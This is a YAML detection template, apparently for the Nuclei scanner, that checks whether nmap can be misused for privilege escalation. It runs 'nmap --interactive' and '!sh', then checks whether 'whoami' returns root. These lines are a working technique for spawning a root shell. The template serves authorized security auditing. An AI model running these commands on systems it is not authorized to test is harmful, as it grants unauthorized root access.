id: nmap-privesc
info:
  name: Nmap – Privilege Escalation
  author: pussycat0x
  severity: high
  description: |
    Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation.
  reference:
    - https://gtfobins.github.io/gtfobins/nmap/
  metadata:
    verified: true
  tags: code,linux,nmap,privesc,enum

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
        nmap --interactive

  - engine:
      - sh
      - bash
    source: |
        !sh

  - engine:
      - sh
      - bash
    source: |
        whoami

    matchers-condition: and
    matchers:
      - type: word
        part: code_2_response
        words:
          - "Welcome to Interactive Mode"
 
      - type: word
        part: code_3_response
        words:
          - "root"
# digest: 4b0a00483046022100a7ae63e8b84681e46dc7632bb77a8959bdeee775975c2d118fd3e49401fec404022100bdc5ba6be2dedff0d0559534c760fd486384a9749180f93488fecc53935d7c4f:c8251d2f4b494560fa261588bedfe7b7
